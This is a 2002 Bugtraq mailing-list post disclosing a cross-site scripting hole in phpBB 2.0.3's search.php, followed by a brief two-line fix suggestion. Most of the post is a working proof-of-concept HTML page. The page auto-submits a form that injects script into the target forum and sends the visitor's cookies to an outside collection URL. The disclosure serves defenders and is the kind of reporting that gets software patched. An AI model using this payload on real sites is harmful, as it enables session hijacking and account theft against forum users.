Bugtraq mailing list archives
Cross-site Scripting Vulnerability in phpBB 2.0.3
From: Fabricio Angeletti <f_a_a () yahoo com>
Date: Tue, 3 Dec 2002 14:09:00 -0600 (CST)
Hello :) here is the code ---------------- <html> <body> <form method="post" name="search" action="http://target/search.php?mode=searchuser"> <input type="hidden" name="search_username" value=""/> </form> <SCRIPT> search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script\>'; document.search.submit(); </script> </body> </html> ------------ work for me using, IE 6 sp 1 (xp) maybe you can do this in a better way but, this example work realy fine the problem is search.php when show search_username u can put anything with a few restrictions solution: 1 Don't show the last entry or something like that 2 filter the code :p Bye _________________________________________________________ Do You Yahoo!? Información de Estados Unidos y América Latina, en Yahoo! Noticias. Visítanos en http://noticias.espanol.yahoo.com
Current thread:
- Cross-site Scripting Vulnerability in phpBB 2.0.3 Fabricio Angeletti (Dec 05)
- Input Validation Error in vbulletin 2.2.x Dorin Balanica (Dec 11)